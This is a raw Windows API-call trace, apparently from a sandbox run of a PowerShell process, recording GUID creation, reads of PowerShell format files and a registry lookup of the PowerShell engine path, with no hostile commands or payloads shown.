	[0809.521] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x6bdb75b4, Data2=0x59cd, Data3=0x422d, Data4=([0]=0x87, [1]=0xaa, [2]=0xf5, [3]=0x78, [4]=0xf7, [5]=0x4, [6]=0x91, [7]=0x31))) returned 0x0
	[0809.522] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xce21297a, Data2=0x8a8, Data3=0x4985, Data4=([0]=0x88, [1]=0xf6, [2]=0x67, [3]=0x4e, [4]=0xb0, [5]=0x11, [6]=0xa0, [7]=0x7a))) returned 0x0
	[0809.522] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xdddcaa12, Data2=0x40ea, Data3=0x48aa, Data4=([0]=0x94, [1]=0x79, [2]=0x76, [3]=0xd3, [4]=0xb3, [5]=0x7a, [6]=0x98, [7]=0xcb))) returned 0x0
	[0809.523] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xdbc1b1f3, Data2=0x632f, Data3=0x4ffd, Data4=([0]=0xbc, [1]=0xb2, [2]=0x82, [3]=0x1f, [4]=0xd6, [5]=0xae, [6]=0xa4, [7]=0x6a))) returned 0x0
	[0809.524] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2ec
	[0809.524] GetFileType (hFile=0x2ec) returned 0x1
	[0809.524] SetErrorMode (uMode=0x1) returned 0x1
	[0809.524] GetFileType (hFile=0x2ec) returned 0x1
	[0809.524] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.525] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.526] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.526] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.527] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.528] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.528] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.529] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.529] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.531] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.531] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.532] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.532] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.532] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.533] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.533] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.533] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.537] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.537] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.537] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.538] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0809.538] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0xe67, lpOverlapped=0x0) returned 1
	[0809.538] ReadFile (in: hFile=0x2ec, lpBuffer=0x3558eb7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3558eb7*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0809.539] ReadFile (in: hFile=0x2ec, lpBuffer=0x35598e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x35598e8*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0809.539] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4a8 | out: phkResult=0x16d4a8*=0x2ec) returned 0x0
	[0809.539] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d42c, lpData=0x0, lpcbData=0x16d428*=0x0 | out: lpType=0x16d42c*=0x1, lpData=0x0, lpcbData=0x16d428*=0x56) returned 0x0
	[0809.539] CoTaskMemAlloc (cb=0x5a) returned 0x2b6db0
	[0809.539] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3fc, lpData=0x2b6db0, lpcbData=0x16d3f8*=0x56 | out: lpType=0x16d3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3f8*=0x56) returned 0x0
	[0809.539] CoTaskMemFree (pv=0x2b6db0) 
	[0809.539] RegCloseKey (hKey=0x2ec) returned 0x0
	[0809.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0809.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0810.427] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xac135aa0, Data2=0xda96, Data3=0x423e, Data4=([0]=0xb0, [1]=0xe5, [2]=0xc1, [3]=0x5a, [4]=0xe3, [5]=0xb7, [6]=0xc1, [7]=0xfb))) returned 0x0
	[0810.428] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x3317b9fb, Data2=0xeb4a, Data3=0x4706, Data4=([0]=0xb2, [1]=0xf7, [2]=0x8f, [3]=0x98, [4]=0x5b, [5]=0xe7, [6]=0x39, [7]=0x1f))) returned 0x0
	[0810.429] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xf46078ea, Data2=0x15eb, Data3=0x4b94, Data4=([0]=0x9a, [1]=0xf4, [2]=0xd0, [3]=0xf2, [4]=0x6b, [5]=0xd3, [6]=0xa6, [7]=0x5c))) returned 0x0
	[0810.430] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x71ddc78e, Data2=0x9e4a, Data3=0x4e37, Data4=([0]=0x87, [1]=0x86, [2]=0x26, [3]=0x93, [4]=0xf9, [5]=0x84, [6]=0x76, [7]=0x6e))) returned 0x0
	[0810.430] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x4931f92a, Data2=0x3ba7, Data3=0x4042, Data4=([0]=0xa5, [1]=0x22, [2]=0xbe, [3]=0xe2, [4]=0x33, [5]=0x64, [6]=0xa0, [7]=0xc5))) returned 0x0
	[0810.431] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xdeb010c7, Data2=0x1943, Data3=0x4674, Data4=([0]=0x8c, [1]=0xb3, [2]=0xa7, [3]=0x0, [4]=0x46, [5]=0x3e, [6]=0xa, [7]=0xdd))) returned 0x0
	[0810.432] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xa1d7f96b, Data2=0x746e, Data3=0x4f07, Data4=([0]=0x97, [1]=0x14, [2]=0x57, [3]=0xc8, [4]=0x5, [5]=0x53, [6]=0x83, [7]=0x19))) returned 0x0
	[0810.432] VirtualQuery (in: lpAddress=0x16c080, lpBuffer=0x16cf40, dwLength=0x30 | out: lpBuffer=0x16cf40*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0810.434] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x1be4feb4, Data2=0x1b46, Data3=0x4769, Data4=([0]=0xaa, [1]=0x78, [2]=0x11, [3]=0x82, [4]=0x4b, [5]=0x16, [6]=0x5, [7]=0x5c))) returned 0x0
	[0810.435] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x2a2d2f03, Data2=0x995e, Data3=0x404a, Data4=([0]=0x91, [1]=0x20, [2]=0x6a, [3]=0xfc, [4]=0x2e, [5]=0xc, [6]=0x68, [7]=0x19))) returned 0x0
	[0810.435] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x1ae2bb0e, Data2=0x2cf3, Data3=0x4dd9, Data4=([0]=0x84, [1]=0x74, [2]=0x3c, [3]=0x53, [4]=0xd8, [5]=0xdd, [6]=0x47, [7]=0xcb))) returned 0x0
	[0810.436] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x776967d9, Data2=0x33f2, Data3=0x474c, Data4=([0]=0xb3, [1]=0x40, [2]=0x34, [3]=0xd2, [4]=0x4b, [5]=0xe7, [6]=0xdf, [7]=0x89))) returned 0x0
	[0810.437] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x2a731da9, Data2=0x8500, Data3=0x4b3e, Data4=([0]=0xac, [1]=0xb5, [2]=0x1, [3]=0x1f, [4]=0xbf, [5]=0x78, [6]=0x70, [7]=0x79))) returned 0x0
	[0810.437] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xa0b6a9ca, Data2=0x74c7, Data3=0x438e, Data4=([0]=0xbf, [1]=0x1b, [2]=0xf4, [3]=0x42, [4]=0xdf, [5]=0xa0, [6]=0xf2, [7]=0xb9))) returned 0x0
	[0810.437] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x8aa79223, Data2=0x3ce6, Data3=0x459d, Data4=([0]=0xb1, [1]=0x99, [2]=0xe, [3]=0x2e, [4]=0x96, [5]=0xdc, [6]=0x82, [7]=0x83))) returned 0x0
	[0810.438] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x2604a103, Data2=0xe5e8, Data3=0x484c, Data4=([0]=0xb7, [1]=0x28, [2]=0x8b, [3]=0x1c, [4]=0xe, [5]=0x5, [6]=0xa7, [7]=0xec))) returned 0x0
	[0810.438] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xbba7bf11, Data2=0x3681, Data3=0x4334, Data4=([0]=0x94, [1]=0xb2, [2]=0x4d, [3]=0x86, [4]=0x3, [5]=0x6e, [6]=0xb5, [7]=0xc4))) returned 0x0
	[0810.438] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xd93e0c51, Data2=0xabf7, Data3=0x4e90, Data4=([0]=0xb8, [1]=0x89, [2]=0x85, [3]=0xf6, [4]=0xd8, [5]=0x2, [6]=0xa8, [7]=0x3c))) returned 0x0
	[0810.438] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x8204f190, Data2=0x6b59, Data3=0x4f5f, Data4=([0]=0x96, [1]=0x88, [2]=0x17, [3]=0x38, [4]=0xa, [5]=0x20, [6]=0x56, [7]=0x79))) returned 0x0
	[0810.439] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x97cf2bcc, Data2=0x1d1d, Data3=0x4dd6, Data4=([0]=0x9f, [1]=0x91, [2]=0x95, [3]=0x7f, [4]=0x63, [5]=0xe5, [6]=0xdb, [7]=0x59))) returned 0x0
	[0810.441] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xf2932896, Data2=0x52d8, Data3=0x4f0f, Data4=([0]=0x9f, [1]=0xf0, [2]=0x95, [3]=0xf2, [4]=0xa7, [5]=0xc7, [6]=0x2f, [7]=0xa4))) returned 0x0
	[0810.441] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x946f05cd, Data2=0xe09e, Data3=0x4dba, Data4=([0]=0x97, [1]=0xd7, [2]=0xfa, [3]=0xc2, [4]=0xb3, [5]=0x9c, [6]=0x4b, [7]=0x37))) returned 0x0
	[0810.442] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x147ef5f1, Data2=0x8dc4, Data3=0x4961, Data4=([0]=0xb2, [1]=0xab, [2]=0x17, [3]=0x38, [4]=0x5e, [5]=0xee, [6]=0x7d, [7]=0x9))) returned 0x0
	[0810.442] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x7b5135bc, Data2=0x74be, Data3=0x4152, Data4=([0]=0x96, [1]=0x17, [2]=0xc3, [3]=0xb, [4]=0xb4, [5]=0x2, [6]=0xfe, [7]=0xc1))) returned 0x0
	[0810.442] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xac0e05cf, Data2=0xe29e, Data3=0x4c63, Data4=([0]=0xa9, [1]=0x39, [2]=0x75, [3]=0x44, [4]=0x4, [5]=0x75, [6]=0xfd, [7]=0xb))) returned 0x0
	[0810.442] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xfd45c1a, Data2=0x169d, Data3=0x4fed, Data4=([0]=0x9f, [1]=0xde, [2]=0xaf, [3]=0xb6, [4]=0x5c, [5]=0x36, [6]=0xc6, [7]=0x9e))) returned 0x0
	[0810.443] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x6270ffc8, Data2=0xe17, Data3=0x4ba3, Data4=([0]=0xb7, [1]=0x1, [2]=0x10, [3]=0x44, [4]=0xc8, [5]=0xb3, [6]=0x57, [7]=0x6a))) returned 0x0
	[0810.443] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x1aa95de1, Data2=0x901f, Data3=0x47f4, Data4=([0]=0xbd, [1]=0x5a, [2]=0xcc, [3]=0x1b, [4]=0xa, [5]=0xa9, [6]=0x97, [7]=0x2e))) returned 0x0
	[0810.443] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x70c33125, Data2=0xe7c3, Data3=0x4bd4, Data4=([0]=0x89, [1]=0x47, [2]=0x84, [3]=0x93, [4]=0xd4, [5]=0xdc, [6]=0xa9, [7]=0x4f))) returned 0x0
	[0810.444] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x736d9a18, Data2=0xddc5, Data3=0x4a5f, Data4=([0]=0x8b, [1]=0x2, [2]=0x40, [3]=0xb5, [4]=0x68, [5]=0x24, [6]=0xd2, [7]=0x83))) returned 0x0
	[0810.444] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x2f9648e3, Data2=0xbed7, Data3=0x4582, Data4=([0]=0xb9, [1]=0x6d, [2]=0x25, [3]=0x9, [4]=0xb4, [5]=0x82, [6]=0xc6, [7]=0x1e))) returned 0x0
	[0810.444] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xcf212377, Data2=0x276f, Data3=0x46ad, Data4=([0]=0x80, [1]=0xc3, [2]=0xb4, [3]=0x26, [4]=0xbd, [5]=0x9e, [6]=0x49, [7]=0xba))) returned 0x0
	[0810.444] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x11227e74, Data2=0x45db, Data3=0x417e, Data4=([0]=0x8f, [1]=0x68, [2]=0x4f, [3]=0x7e, [4]=0xc8, [5]=0x77, [6]=0x63, [7]=0xe2))) returned 0x0
	[0810.445] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x52559a7e, Data2=0x87c6, Data3=0x4d06, Data4=([0]=0x80, [1]=0xe6, [2]=0x19, [3]=0xa2, [4]=0x36, [5]=0xea, [6]=0x6f, [7]=0x8b))) returned 0x0
	[0811.498] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x70d33cdf, Data2=0xf67, Data3=0x48b0, Data4=([0]=0x93, [1]=0x26, [2]=0x25, [3]=0xf1, [4]=0xbe, [5]=0x71, [6]=0x91, [7]=0x3b))) returned 0x0
	[0811.499] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x4a27a058, Data2=0xc19d, Data3=0x4f74, Data4=([0]=0x9b, [1]=0xf4, [2]=0x8d, [3]=0xf8, [4]=0xf5, [5]=0x2e, [6]=0x53, [7]=0x29))) returned 0x0
	[0811.499] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xf17527c4, Data2=0xa44b, Data3=0x4b53, Data4=([0]=0xbc, [1]=0x30, [2]=0x82, [3]=0xc6, [4]=0xcb, [5]=0xda, [6]=0x3d, [7]=0x8e))) returned 0x0
	[0811.499] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x559b5d26, Data2=0xdee, Data3=0x4d72, Data4=([0]=0x9e, [1]=0x4a, [2]=0x6c, [3]=0xad, [4]=0xb3, [5]=0xe, [6]=0x8b, [7]=0xc3))) returned 0x0
	[0811.500] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x31233282, Data2=0x3ddc, Data3=0x4cab, Data4=([0]=0xbb, [1]=0xf9, [2]=0x37, [3]=0x6a, [4]=0xe, [5]=0x1e, [6]=0x8f, [7]=0xac))) returned 0x0
	[0811.500] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xa752d71c, Data2=0x24de, Data3=0x4f48, Data4=([0]=0x97, [1]=0x21, [2]=0xf4, [3]=0x8, [4]=0x66, [5]=0x3e, [6]=0x7e, [7]=0xe0))) returned 0x0
	[0811.501] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xb785d94d, Data2=0xb361, Data3=0x4a7f, Data4=([0]=0xad, [1]=0x69, [2]=0x2a, [3]=0x4b, [4]=0x4, [5]=0x5a, [6]=0xa3, [7]=0x72))) returned 0x0
	[0811.501] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x4427fbe1, Data2=0x7ddd, Data3=0x4b36, Data4=([0]=0x92, [1]=0x34, [2]=0xf2, [3]=0xbd, [4]=0x6e, [5]=0x8d, [6]=0x2e, [7]=0x3))) returned 0x0
	[0811.502] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x249f4456, Data2=0x3d99, Data3=0x4f6d, Data4=([0]=0xb0, [1]=0x49, [2]=0xdd, [3]=0x9, [4]=0x4f, [5]=0xf5, [6]=0x7c, [7]=0x92))) returned 0x0
	[0811.503] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x41815baa, Data2=0x9679, Data3=0x4d42, Data4=([0]=0x89, [1]=0x7a, [2]=0xa7, [3]=0x6f, [4]=0x27, [5]=0xb4, [6]=0x91, [7]=0x30))) returned 0x0
	[0811.505] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xe58e3a57, Data2=0x940e, Data3=0x494b, Data4=([0]=0x8f, [1]=0x6d, [2]=0xca, [3]=0x1b, [4]=0x25, [5]=0x5b, [6]=0x9d, [7]=0x21))) returned 0x0
	[0811.505] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x5fd86099, Data2=0x2883, Data3=0x4fe3, Data4=([0]=0xb7, [1]=0xa2, [2]=0x9, [3]=0x46, [4]=0x37, [5]=0xab, [6]=0xec, [7]=0xb0))) returned 0x0
	[0811.505] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xfd98367c, Data2=0x763, Data3=0x441e, Data4=([0]=0x97, [1]=0xa8, [2]=0x84, [3]=0xbc, [4]=0x45, [5]=0x72, [6]=0x5a, [7]=0x6a))) returned 0x0
	[0811.506] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xc276fb31, Data2=0x233e, Data3=0x4ee0, Data4=([0]=0xb7, [1]=0xa1, [2]=0xa8, [3]=0x5d, [4]=0xb2, [5]=0xcb, [6]=0x8d, [7]=0xd6))) returned 0x0
	[0811.506] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x295e0569, Data2=0x9722, Data3=0x46b6, Data4=([0]=0xb1, [1]=0x36, [2]=0x4d, [3]=0xa8, [4]=0x75, [5]=0x1f, [6]=0x5d, [7]=0xc6))) returned 0x0
	[0811.508] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2ec
	[0811.511] GetFileType (hFile=0x2ec) returned 0x1
	[0811.511] SetErrorMode (uMode=0x1) returned 0x1
	[0811.511] GetFileType (hFile=0x2ec) returned 0x1
	[0811.511] ReadFile (in: hFile=0x2ec, lpBuffer=0x36b7880, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x36b7880*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0811.514] ReadFile (in: hFile=0x2ec, lpBuffer=0x36b7880, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x36b7880*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0811.516] ReadFile (in: hFile=0x2ec, lpBuffer=0x36b7880, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x36b7880*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0811.516] ReadFile (in: hFile=0x2ec, lpBuffer=0x36b7880, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x36b7880*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0811.518] ReadFile (in: hFile=0x2ec, lpBuffer=0x36b7880, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x36b7880*, lpNumberOfBytesRead=0x16d418*=0x8b4, lpOverlapped=0x0) returned 1
	[0811.518] ReadFile (in: hFile=0x2ec, lpBuffer=0x36b6c9c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x36b6c9c*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0811.518] ReadFile (in: hFile=0x2ec, lpBuffer=0x36b7880, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x36b7880*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0811.518] CloseHandle (hObject=0x2ec) returned 1
	[0811.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0811.518] SetErrorMode (uMode=0x1) returned 0x1
